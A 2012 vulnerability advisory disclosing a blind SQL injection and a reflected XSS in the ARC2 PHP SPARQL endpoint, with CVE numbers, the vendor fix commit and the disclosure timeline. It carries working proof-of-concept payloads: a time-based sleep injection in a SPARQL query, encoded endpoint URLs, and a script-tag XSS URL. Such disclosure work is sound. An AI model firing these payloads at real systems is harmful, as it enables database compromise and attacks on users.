Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.
ARC v2011-12-01 Multiple vulnerabilities
Name ARC2 v2011-12-01 Multiple vulnerabilities
Systems Affected ARC2 v2011-12-01
Severity High
Impact High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vendor https://github.com/semsol/arc2
Advisory http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt
Author Simone "negator" Onofri, Luca "beinux3" Napolitano
Date 20121123
I. BACKGROUND
ARC is a flexible RDF system for semantic web and PHP practitioners.
It's free, open-source, easy to use, and runs in most web server
environments.
II. DESCRIPTION
ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular the SPARQL+
Endpoint.
III. ANALYSIS
Summary:
A) Blind SQL Injection (SQLI) Vulnerability
B) Reflected Cross Site Scripting (XSS) Vulnerability
A) Blind SQL Injection (SQLI) Vulnerability
A blind SQL Injection vulnerability exists in ARC version v2011-12-01.
ARC stores triples into a mySQL database and uses a translator from
SPARQL and SQL. To improve debugging of the application the developer
has included comments that contain the query string value. It's possible
to Inject SQL commands on these comments if data passed is into a SPARQL
WHERE clause.
In the "getTriplePatternSQL()" function, "ARC2_StoreSelectQueryHandler
.php" file, the query sent to MySQL is automatically debugged (without
the ability to conditionally disable such feature) plugging comments
containing the pattern's "S P O" (Subject, Predicate, Object; the
semantic web triple concept) values.
SPARQL Query:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
PREFIX iam: <http://x>
SELECT * WHERE {
?user iam:user "lol*/ OR (SELECT sleep(5))=1--" .
}
LIMIT 100
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
Actual MySQL Query:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
SELECT
T_0_0_0.s AS `user`,
T_0_0_0.s_type AS `user type`
FROM arc_tests_triple T_0_0_0
WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */
AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */
LIMIT 0,100
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
What follows is a demo exploitation of the SPARQL Endpoint.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$query = 'PREFIX iam: <http://x>
SELECT * WHERE {
?user iam:user "lol*/ OR (SELECT sleep(5))=1--".?password iam:hasPassw
ord "password" .
} LIMIT 100';
$store->setUp();
$store->query($query, 'rows')
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx
>%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELE
CT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho
w_inline=1
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
The CVSS v2 score for Blind SQL Injection is: High 10/10, vector
(AV:N/AC:L/Au:N/C:C/I:C/A:C).
B) Reflected Cross Site Scripting (XSS) Vulnerability
A Reflected Cross Site Scripting vulnerability exists in ARC version
v2011-12-01 endpoint function.
The GET variable "query" is reflected in page without proper encoding
when the "output" option is set to "htmltab".
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
<div class="results">
Could not properly handle "<script src=/lol.it/x><script>" in
ARC2_SPARQLPlusParser
</div>
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
PoC URL that exploits this vulnerability:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx><
script>&output=htmltab&jsonp=&key=&show_inline=1
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10,
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).
IV. DETECTION
ARC2 v2011-12-01 and possibly earlier versions are vulnerable.
V. WORKAROUND
Update ARC2 to the latest release or manually fix the "ARC2_StoreEndpoin
t.php" and other files as described by the commit ID 0a39922edaf6a72c5af
60aaeaff7bc4e92a6d342.
https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342
VI. VENDOR RESPONSE
Issues fixed in GIT commit 0a39922.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned:
- The name CVE-2012-5872 to Blind SQL Injection Vulnerability.
- The name CVE-2012-5873 to Reflected Cross Site Scripting
Vulnerability.
This is a candidate for inclusion in the CVE list http://cve.mitre.org,
which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released
IX. REFERENCES
Well you know what SQLi and XSS are, right?
X. CREDIT
Simone "negator" Onofri is credited for the discovery of this
vulnerability.
Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.
Thanks to Francesco "ascii" Ongaro for revision and fine editing.
Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net
Luca "beinux3" Napolitano
web site:http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com
Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it
XI. LEGAL NOTICES
Copyright (c) 2012
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.